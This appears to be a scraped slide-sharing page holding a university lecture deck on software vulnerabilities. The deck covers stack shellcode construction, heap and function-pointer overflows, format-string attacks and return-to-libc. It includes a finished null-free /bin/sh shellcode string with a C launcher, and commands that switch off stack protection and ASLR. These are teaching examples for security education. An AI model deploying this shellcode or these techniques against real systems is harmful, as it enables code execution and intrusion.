software vulnerability i
play

Software Vulnerability I Presenter: Yinzhi Cao Lehigh University - PowerPoint PPT Presentation

Sep 26, 2023 •576 likes •1.83k views

CSE350/450 Lehigh University Fall 2016 Software Vulnerability I Presenter: Yinzhi Cao Lehigh University Overview Buffer Overflow Shellcode Heap Overflow Format Strings Return-oriented Programming Metasploit 101 Anatomy of the Stack

  1. Dump of assembler code for function main: Move array[0] to <+0>: push %ebp %eax <+1>: mov %esp,%ebp <+3>: and $0xfffffff0,%esp <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  2. Dump of assembler code for function main: Put the third <+0>: push %ebp parameter of execve <+1>: mov %esp,%ebp (NULL) onto the stack <+3>: and $0xfffffff0,%esp <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  3. Dump of assembler code for function main: Load the address of <+0>: push %ebp array into %edx <+1>: mov %esp,%ebp <+3>: and $0xfffffff0,%esp <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  4. Dump of assembler code for function main: Put %edx onto the <+0>: push %ebp stack as the second <+1>: mov %esp,%ebp parameter <+3>: and $0xfffffff0,%esp <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  5. Put %eax (the address Dump of assembler code for function main: of “/bin/sh”)onto the <+0>: push %ebp <+1>: mov %esp,%ebp stack as the third <+3>: and $0xfffffff0,%esp parameter <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  6. Call the function Dump of assembler code for function main: execve <+0>: push %ebp <+1>: mov %esp,%ebp <+3>: and $0xfffffff0,%esp <+6>: sub $0x20,%esp #include <stdio.h> <+9>: movl $0x80c57a8,0x18(%esp) int main() { <+17>: movl $0x0,0x1c(%esp) char *array[2]; <+25>: mov 0x18(%esp),%eax array[0] = "/bin/sh"; <+29>: movl $0x0,0x8(%esp) array[1] = NULL; <+37>: lea 0x18(%esp),%edx execve(array[0], array, NULL); <+41>: mov %edx,0x4(%esp) return 0; <+45>: mov %eax,(%esp) } <+48>: call 0x8053ae0 <execve> <+53>: mov $0x0,%eax <+58>: leave <+59>: ret End of assembler dump.

  7. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Save the frame pointer <+5>: mov 0xc(%esp),%ecx <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax <+18>: call *0x80ef5a4 <+24>: cmp $0xfffff000,%eax <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  8. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Move the third <+5>: mov 0xc(%esp),%ecx parameter (NULL) into <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax %edx <+18>: call *0x80ef5a4 <+24>: cmp $0xfffff000,%eax <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  9. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Move the second <+5>: mov 0xc(%esp),%ecx parameter (the <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax address of array) into <+18>: call *0x80ef5a4 %ecx <+24>: cmp $0xfffff000,%eax <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  10. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Move the first <+5>: mov 0xc(%esp),%ecx parameter (the <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax address of “/bin/sh”) <+18>: call *0x80ef5a4 into %ecx <+24>: cmp $0xfffff000,%eax <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  11. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Move 0xb into %eax <+5>: mov 0xc(%esp),%ecx <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax <+18>: call *0x80ef5a4 <+24>: cmp $0xfffff000,%eax <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  12. Dump of assembler code for function execve: <+0>: push %ebx <+1>: mov 0x10(%esp),%edx Call into the kernel <+5>: mov 0xc(%esp),%ecx model. *0x80ef5a4 is <+9>: mov 0x8(%esp),%ebx <+13>: mov $0xb,%eax a wrapper function. <+18>: call *0x80ef5a4 The simplest way is to <+24>: cmp $0xfffff000,%eax call int 80. <+29>: ja 0x8053b01 <execve+33> <+31>: pop %ebx <+32>: ret <+33>: mov $0xffffffe8,%edx <+39>: neg %eax <+41>: mov %gs:0x0,%ecx <+48>: mov %eax,(%ecx,%edx,1) <+51>: or $0xffffffff,%eax <+54>: pop %ebx <+55>: ret End of assembler dump.

  13. (1)Put the address of /bin/sh in ebx (2)Ensure /bin/sh is null terminated with a '\0’ (3)Put the address of /bin/sh in array[0] (4)Put a four-byte NULL in array[1] (5)Put the address of the array into ecx (6)Put a NULL into edx (7)Put 0xb in eax (8)Call int 0x80 (9)Store 0x0 in ebx exit(0) (10)Store 0x1 in eax (11)Call int 0x80

  14. ???? %ebx # get string into ebx movb $0x0, string-end(%ebx) # null terminate string movl %ebx, array-0-offset(%ebx) # store address of string movl $0x0, array-1-offset(%ebx) # null terminate array movl $0x0, %edx # put a null in edx leal array-0-offset(%ebx), %ecx # put array in ecx movl $0xb, %eax # set syscall number for execve int $0x80 # trap to kernel movl $0x0, %ebx # set exit status of 0 movl $0x1, %eax # set syscall number for exit int $0x80 # trap to kernel .string "/bin/sh" How to know the address of “/bin/sh”?

  15. jmp call-offset ... call jump-offset .string "/bin/sh" When executing the call instruction, the machine pushes the address of the instruction immediately following it onto the stack. We can use popl %ebx to obtain the address of “/bin/sh”

  16. jmp call-offset # (2) popl %ebx # (1) get string into ebx movb $0x0, string-len(%ebx) # (4) null terminate string movl %ebx, array-0-offset(%ebx) # (3) store address of string movl $0x0, array-1-offset(%ebx) # (7) null terminate array movl $0x0, %edx # (5) put a null in edx leal array-0-offset(%ebx), %ecx # (3) put array in ecx movl $0xb, %eax # (5) set syscall number for execve int $0x80 # (2) trap to kernel movl $0x0, %ebx # (5) set exit status of 0 movl $0x1, %eax # (5) set syscall number for exit int $0x80 # (2) trap to kernel call jump-offset # (5) .string "/bin/sh" /bin/sh\0addrnull string-len: 0x7 since the string is 7 characters long array-0-offset: 0x8 to begin the array just after the null character in the string array-1-offset: 0xc, 4 bytes after array-0-offset

  17. main: jmp main+0x2f # (5) popl %ebx # (1) get string into ebx movb $0x0, 0x7(%ebx) # (4) null terminate string movl %ebx, 0x8(%ebx) # (3) store address of string movl $0x0, 0xc(%ebx) # (7) null terminate array movl $0x0, %edx # (5) put a null in edx leal 0x8(%ebx), %ecx # (3) put array in ecx movl $0xb, %eax # (5) set syscall number for execve int $0x80 # (2) trap to kernel movl $0x0, %ebx # (5) set exit status of 0 movl $0x1, %eax # (5) set syscall number for exit int $0x80 # (2) trap to kernel call main+0x5 # (5) .string "/bin/sh" .globl main .type main, @function

  18. 80483b4: e9 2a 00 00 00 jmp 80483e3 <main+0x2f> 80483b9: 5b pop %ebx 80483ba: c6 43 07 00 movb $0x0,0x7(%ebx) 80483be: 89 5b 08 mov %ebx,0x8(%ebx) 80483c1: c7 43 0c 00 00 00 00 movl $0x0,0xc(%ebx) 80483c8: ba 00 00 00 00 mov $0x0,%edx 80483cd: 8d 4b 08 lea 0x8(%ebx),%ecx 80483d0: b8 0b 00 00 00 mov $0xb,%eax 80483d5: cd 80 int $0x80 80483d7: bb 00 00 00 00 mov $0x0,%ebx 80483dc: b8 01 00 00 00 mov $0x1,%eax 80483e1: cd 80 int $0x80 80483e3: e8 d1 ff ff ff call 80483b9 <main+0x5> 80483e8: 2f das 80483e9: 62 69 6e bound %ebp,0x6e(%ecx) 80483ec: 2f das 80483ed: 73 68 jae 8048457 <__libc_csu_init+0x67>

  19. char shellcode[] = "\xe9\x2a\x00\x00\x00\x5b\xc6\x43\x07\x00" "\x89\x5b\x08\xc7\x43\x0c\x00\x00\x00\x00\xba\x00\x00\x00\x00" "\x8d\x4b\x08\xb8\x0b\x00\x00\x00\xcd\x80\xbb\x00\x00\x00\x00" "\xb8\x01\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff/bin/sh"; void shell() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } int main() { shell(); return 0; }

  20. Removing Null Characters main: eb 2a jmp main+0x2f popl %ebx Long jump -> short jump movb $0x0, 0x7(%ebx) movl %ebx, 0x8(%ebx) movl $0x0, 0xc(%ebx) movl $0x0, %edx leal 0x8(%ebx), %ecx movl $0xb, %eax int $0x80 movl $0x0, %ebx movl $0x1, %eax int $0x80 call main+0x5 .string "/bin/sh" .globl main .type main, @function

  21. Removing Null Characters main: jmp main+0x2f xorl %eax, %eax popl %ebx movb %al, 0x7(%ebx) movb $0x0, 0x7(%ebx) movl %ebx, 0x8(%ebx) movl $0x0, 0xc(%ebx) movl %eax, 0xc(%ebx) movl $0x0, %edx movl %eax, %edx leal 0x8(%ebx), %ecx movl $0xb, %eax int $0x80 movl $0x0, %ebx movl $0x1, %eax int $0x80 call main+0x5 .string "/bin/sh" .globl main .type main, @function

  22. Removing Null Characters main: jmp main+0x2f popl %ebx movb $0x0, 0x7(%ebx) movl %ebx, 0x8(%ebx) movl $0x0, 0xc(%ebx) movl $0x0, %edx leal 0x8(%ebx), %ecx movl $0xb, %eax movb $0xb, %al int $0x80 movl $0x0, %ebx movl $0x1, %eax int $0x80 call main+0x5 .string "/bin/sh" .globl main .type main, @function

  23. Removing Null Characters main: jmp main+0x2f popl %ebx movb $0x0, 0x7(%ebx) movl %ebx, 0x8(%ebx) movl $0x0, 0xc(%ebx) movl $0x0, %edx leal 0x8(%ebx), %ecx movl $0xb, %eax movb $0xb, %al int $0x80 movl $0x0, %ebx movl $0x1, %eax int $0x80 call main+0x5 .string "/bin/sh" .globl main .type main, @function

  24. Removing Null Characters main: jmp main+0x2f popl %ebx movb $0x0, 0x7(%ebx) movl %ebx, 0x8(%ebx) movl $0x0, 0xc(%ebx) movl $0x0, %edx leal 0x8(%ebx), %ecx movl $0xb, %eax int $0x80 xorl %ebx, %ebx movl $0x0, %ebx movl %ebx, %eax movl $0x1, %eax inc %eax int $0x80 call main+0x5 .string "/bin/sh" .globl main .type main, @function

  25. Final Shellcode char shellcode[] = "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43" "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89" "\xd8\x40\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh";

  26. CSE350/450 Lehigh University Fall 2016 Software Vulnerability II Presenter: Yinzhi Cao Lehigh University

  27. Acknowledgement http://www.cs.virginia.edu/~evans/cs216/guide s/x86.html http://cs.baylor.edu/~donahoo/tools/gdb/tutori al.html https://www.blackhat.com/presentations/bh- usa- 08/Shacham/BH_US_08_Shacham_Return_Orie nted_Programming.pdf Some of the slides or contents are borrowed from the above links.

  28. Some Useful Commands (1) gcc n -z execstack (Make stack executable) n -static (Static linking) n -fno-stack-protector (Turn off stack protector) n -g (Generate and embed debug options) n -Wall (Turn on all warnings) n -o (Output a file) gcc can be used to compile assembly file. n gcc -g -o shellcode shellcode.s

  29. Some Useful Commands (2) gdb binanry n b linenumber (break at specific line number) n run (execute the program) n attach PID (attach to a process with PID) n c (continue) n n (next) n x address (examine the memory) n x/nfu (n: number; f: s, string, i, instruction; u: unit size, such as Byes, Words, and Halfwords.) n p variable (print) n disass function_name (disassemble the function) n info frame (stack info) n l (list code)

  30. Some Useful Commands (3) objdump n -d (disassemble) sysctl -w kernel.randomize_va_space=0 n Disable address space layout randomization

  31. How to use these commands? (1) Inspect a C program (e.g., which generates a shell) gcc -g -static -o shell shell.c gdb shell disass main disass execve (2) Write your shellcode in assembly gcc -g -o shellcode shellcode.s objdump -d shellcode | grep -A20 '<main>'

  32. How to use these commands? (3) compile a vulnerable application gcc -g -Wall -fno-stack-protector -z execstack -o vulnerable vulnerable.c (4) debug a vulnerable application ps aux | grep applicationname gdb attach PID info frame list main b linenumber x/s

  33. A Brief Overview of x86 Architecture

  34. Caller Rules (1) Save EAX, ECX, EDX (caller-saved registers) on the stack if necessary. (2) Push paramemters in inverted order (i.e. last parameter first). (3) Invoke call instruction, which places the return address on top of the parameters on the stack.

  35. Callee Rules (1) Push the value of EBP onto the stack, and then copy the value of ESP into EBP push ebp mov ebp, esp (2) Allocate local variables by making space on the stack. (3) Save the values of the callee-saved registers that will be used by the function. EBX, EDI, and ESI

  36. Callee Rules when Returning (1) Leave the return value in EAX. (2) Restore the old values of any callee-saved registers (e.g., EDI and ESI) that were modified. (3) Deallocate local variables. (4) Restore the caller's base pointer value by popping EBP off the stack. (5) Execute ret.

  37. Call Rules when Returning (1) Remove the parameters from stack. (2) Restore EAX, ECX, EDX if necessary.

  38. Heap Overflow Overwrite a buffer on the heap Return address is not available n File pointer n Function pointer

  39. int main() { static char filename[] = "/tmp/heap-overflow.txt"; static char buffer[64] = "”; gets(buffer); FILE *fd = fopen(filename, "w"); if (fd != NULL) { fputs(buffer, fd); fclose(fd); } return 0; }

  40. Stack filename “/tmp/heap-overflow.txt” buffer int main() { static char filename[] = "/tmp/heap-overflow.txt"; IP static char buffer[64] = "”; gets(buffer); FILE *fd = fopen(filename, "w"); if (fd != NULL) { fputs(buffer, fd); fclose(fd); } return 0; }

  41. Stack filename “/tmp/heap-overflow.txt” buffer “AAAAA…” int main() { static char filename[] = "/tmp/heap-overflow.txt"; IP static char buffer[64] = "”; gets(buffer); FILE *fd = fopen(filename, "w"); if (fd != NULL) { fputs(buffer, fd); fclose(fd); } return 0; }

  42. Stack filename “Atmp/heap-overflow.txt” buffer “AAAAA…” int main() { static char filename[] = "/tmp/heap-overflow.txt"; IP static char buffer[64] = "”; gets(buffer); FILE *fd = fopen(filename, "w"); if (fd != NULL) { fputs(buffer, fd); fclose(fd); } return 0; }

  43. Stack filename “AAAAAheap-overflow.txt” buffer “AAAAA…” int main() { static char filename[] = "/tmp/heap-overflow.txt"; IP static char buffer[64] = "”; gets(buffer); FILE *fd = fopen(filename, "w"); if (fd != NULL) { fputs(buffer, fd); fclose(fd); } return 0; }

  44. What if you overwrite “/tmp/heap- overflow.txt” with “/etc/passwd”?

  45. Overwrite Function Pointers void shell() { execlp("sh", NULL); } void nothing() {} int main() { static void (*func)() = nothing; One can overwrite static char buffer[64] = ""; func with shell instead gets(buffer); of nothing. func(); return 0; }

  46. Format Strings Attack How do format strings work? Reading memory Reading exact memory location Altering memory with arbitrary data Altering exact memory location with arbitrary data Altering exact memory location with intentional data

  47. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x%x.\nB is %i and is at 0x%x.\n"; “\n" printf(format, a, &a, b, &b); The address of b } b The address of a a The address of format

  48. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x%x.\nB is %i and is at 0x%x.\n"; “\n" printf(format, a, &a, b, &b); The address of b } b The address of a a Pop the address of format

  49. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x%x.\nB is %i and is at 0x%x.\n"; “\n" printf(format, a, &a, b, &b); The address of b } b The address of a a pop

  50. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x %x .\nB is %i and is at 0x%x.\n"; “\n" printf(format, a, &a, b, &b); The address of b } b The address of a pop

  51. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x%x.\nB is %i and is at 0x%x.\n"; “\n" printf(format, a, &a, b, &b); The address of b } b pop

  52. How do format strings work? a b int main() { Format string int a = 5, b = 6; "A is %i and is at 0x%x.” char format[] = "A is %i and is at “\nB is %i and is at 0x%x.” 0x%x.\nB is %i and is at 0x %x .\n"; “\n" printf(format, a, &a, b, &b); } The address of b pop

  53. Reading Memory a b printf("AAAA.%x.%x.%x.%x.%x.%x”) Format string ”AAAA.%x.%x.%x.%x. %x.%x” AAAA.200.804a008.80482a9.0.f7fe09e0.414 14141 Some internal data for printf The address of format string

  54. Reading exact memory location a printf("\x4f\xde\xff\xff.%x.%x. b %x.%x.%x ... %s”) \x4f\xde\xff\xff .%x.%x.%x.%x.%x ... %s %s: Print the string at 0xffffde4f Some internal data for printf The address of format string

  55. Altering Memory with Arbitrary Data %n: the number of characters written so far printf("hello world\n%n", &written); written = 12

  56. Altering exact memory location with arbitrary data a printf("\x4f\xde\xff\xff.%x.%x. b %x.%x.%x ... %n”) \x4f\xde\xff\xff .%x.%x.%x.%x.%x ... %s %n: Write the number of characters Some internal data for written so far at 0xffffde4f printf The address of format string

  57. Altering exact memory location with intentional data Say, for example, we want to write 0xffffd600 at 0xffffde4f 0xffffde4f 00 01 00 00

  58. Altering exact memory location with intentional data Say, for example, we want to write 0xffffd600 at 0xffffde4f 0xffffde4f 00 01 d6 00 01 00 00 00 00

  59. Altering exact memory location with intentional data Say, for example, we want to write 0xffffd600 at 0xffffde4f 0xffffde4f 00 d6 01 ff 00 01 00 00 00 00

  60. Altering exact memory location with intentional data Say, for example, we want to write 0xffffd600 at 0xffffde4f 0xffffde4f 00 d6 ff 01 ff 00 02 00 00 00 00

  61. Deployed Defense Mechanism I Address Space Layout Randomization (ASLR) Randomize bases of memory regions n Stack (Thwarts traditional stack overflow) n Brk (Heap – Thwarts traditional heap overflow) n Exec (Program binary) n Etc. Bypass: Memory disclosure attacks

  62. Deployed Defense Mechanism II Write xor Execute n Pages marked write can’t be executed Bypass: Return-to-libc attacks n Instead of invoking a shellcode, we could invoke a libc function, such as system(“/bin/sh”); More Complex: Return-oriented Programming

  63. Return-to-libc Attack We need to make the layout of the stack ready for the function system

  64. str FP Return Address Saved Frame Pointer SP void function(char *str) { char buffer[8]; IP strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

  65. str FP Return Address Saved Frame Pointer 0x41414141 SP 0x41414141 void function(char *str) { char buffer[8]; IP strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

  66. str FP Return Address 0x41414141 0x41414141 SP 0x41414141 void function(char *str) { char buffer[8]; IP strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

  67. str FP The address of function system 0x41414141 0x41414141 SP 0x41414141 void function(char *str) { char buffer[8]; IP strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

  68. A fake return address FP The address of function system 0x41414141 0x41414141 SP 0x41414141 void function(char *str) { char buffer[8]; IP strcpy(buffer,str); } void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Hackers vs Testers: A Comparison of Software Vulnerability Discovery Processes Daniel Votipka ,

Hackers vs Testers: A Comparison of Software Vulnerability Discovery Processes Daniel Votipka ,

Hackers vs Testers: A Comparison of Software Vulnerability Discovery Processes Daniel Votipka , Rock A. Stevens, Elissa M. Redmiles, Jeremy Hu, and Michelle L. Mazurek 22 May 2018 VULNERABILITY DISCOVERY 2 VULNERABILITY DISCOVERY

375 views • 26 slides
Vulnerability disclosure Dont forget overall goal: improve software safety Consider

Vulnerability disclosure Dont forget overall goal: improve software safety Consider

Vulnerability disclosure Dont forget overall goal: improve software safety Consider incentives for researchers, software vendors, customers Supply chain can be complex Software component developers Open source Resellers

621 views • 20 slides
Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a

Vulnerability Management Spring 2020 Jay Chen What is a vulnerability? A vulnerability is a cybersecurity flaw in a system that leave it open to attack. A vulnerability may also refer to any type of weakness in a computer system

407 views • 16 slides
FUZZING FOR VULNERABILITY DETECTION FUZZING FOR VULNERABILITY DETECTION WHO WE ARE Prof. Dr.

FUZZING FOR VULNERABILITY DETECTION FUZZING FOR VULNERABILITY DETECTION WHO WE ARE Prof. Dr.

MASTER SEMINAR WS16/17 PROF. DR. ALEXANDER PRETSCHNER SAAHIL OGNAWALA FUZZING FOR VULNERABILITY DETECTION FUZZING FOR VULNERABILITY DETECTION WHO WE ARE Prof. Dr. Alexander Pretschner Head of Chair XXII Software Engineering @TUM since

489 views • 21 slides
Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a

Arjun Surendra SaciWATERs Vulnerability Vulnerability is the propensity to suffer a significant shock that brings welfare below a socially accepted level (Khl, 2003) Vulnerability increases when there is uncertainty with respect to

529 views • 21 slides
Contents What is vulnerability? Why conduct vulnerability assessments? Defining

Contents What is vulnerability? Why conduct vulnerability assessments? Defining

6/19/2015 Vulnerability and Capacity Assessment Index (VCAI) for Climate Change Adaptation SVRK Prabhakar USAID ADAPT Asia-Pacific Presented at NABARD Training Workshop, Mumbai on 18 June 2015 Contents What is vulnerability? Why

705 views • 21 slides
Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1

Vulnerability Analysis and Food Aid W orking Group Chaired by W FP/ VAM Unit Vulnerability Assessm ent 2 0 0 4 Luanda, 2 5 June 2 0 0 4 Vulnerability Assessment 2004 - p1 Overview 1 . Methodology of the VA 2 0 0 4 2 . Highlights of

703 views • 28 slides
Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and

Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and

Vulnerability Screening Tool Identifying and addressing vulnerability: A tool for asylum and migration systems Purpose Intended to guide &amp; inform frontline workers &amp; decision makers on the relevance of vulnerability factors to

507 views • 19 slides
Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures

Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures

Earthquake Vulnerability Earthquake Vulnerability Vulnerability Assessment &amp; EVR measures Islamabad Pakistan Assessment and Vulnerability Assessment and Vulnerability Reduction Measures Reduction Measures adpc Asian Disaster

702 views • 46 slides
Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020

Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020

Common Vulnerability Scoring System Engineering Secure Software Last Revised: November 13, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 How Bad is Bad? Weve seen many vulnerabilities Many of them can do catastrophic

541 views • 35 slides
Software Vulnerability Handling and practical incident recognition Idea: ( ) Sven Gabriel

Software Vulnerability Handling and practical incident recognition Idea: ( ) Sven Gabriel

EGI Community Forum 2014 Software Vulnerability Handling and practical incident recognition Idea: ( ) Sven Gabriel NIKHEF All the hard work: Heiko Reese KIT-CERT ( ) Sven Gabriel? 20042007: FZK Karlsruhe, T-1 GridKa Site Admin

1.19k views • 38 slides
Introduction What is Disaster vulnerability? Vulnerability is the inability to resist a

Introduction What is Disaster vulnerability? Vulnerability is the inability to resist a

Vulnerability to Disasters: A Gendered Analysis on Water Availability and Livelihoods in Nadu Colony, Kovalam, Chennai, India Group No: 02 Sumaia Kashem Shreeya Lohani Shanmuga Priya. G Meththa Prabodhani Menike

834 views • 40 slides
Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security

Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security

Vulnerability Analysis Part 2 RK Shyamasundar IIT Bombay Outline Software Security Web Application Security Buffer Overflow Web content security: SSL Buffer Overflow Phishing attacks mitigation techniques

1.51k views • 84 slides
Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust

Engineering Secure Software The Basics of Software Security Terminology Vulnerabilities Trust Boundary Attacks Threats Application Attacker Exploit Vulnerability : a software defect with security consequences Threat : a potential danger to

1.54k views • 80 slides
Web vulnerability scanning and exploitation tools Scaling vulnerability scanning Companies

Web vulnerability scanning and exploitation tools Scaling vulnerability scanning Companies

Web vulnerability scanning and exploitation tools Scaling vulnerability scanning Companies with 1000+ web applications running Move to m -services architectures making things worse Huge shortage of skilled security engineers to

732 views • 48 slides
Secure Software Programming and Vulnerability Analysis Christopher Kruegel

Secure Software Programming and Vulnerability Analysis Christopher Kruegel

Automation Systems Group Secure Software Programming and Vulnerability Analysis Christopher Kruegel chris@auto.tuwien.ac.at http://www.auto.tuwien.ac.at/~chris Automation Systems Group Buffer Overflows Secure Software Programming 2

520 views • 17 slides
CS 423 Operating System Design: Concurrency Professor Adam Bates Fall 2018 CS423:

CS 423 Operating System Design: Concurrency Professor Adam Bates Fall 2018 CS423:

CS 423 Operating System Design: Concurrency Professor Adam Bates Fall 2018 CS423: Operating Systems Design Goals for Today Learning Objectives: Understand different primitives for concurrency at the operating system layer

533 views • 27 slides
The Abstract Domain of Segmented Ranking Functions Caterina Urban D epartement

The Abstract Domain of Segmented Ranking Functions Caterina Urban D epartement

The Abstract Domain of Segmented Ranking Functions Caterina Urban D epartement dInformatique Ecole Normale Sup erieure SAS 2013 Seattle, USA Introduction Concrete Semantics Our Contribution An Abstract Domain for Termination

1.02k views • 74 slides
Flow Caml in a Nutshell Vincent Simonet INRIA Rocquencourt Cristal project

Flow Caml in a Nutshell Vincent Simonet INRIA Rocquencourt Cristal project

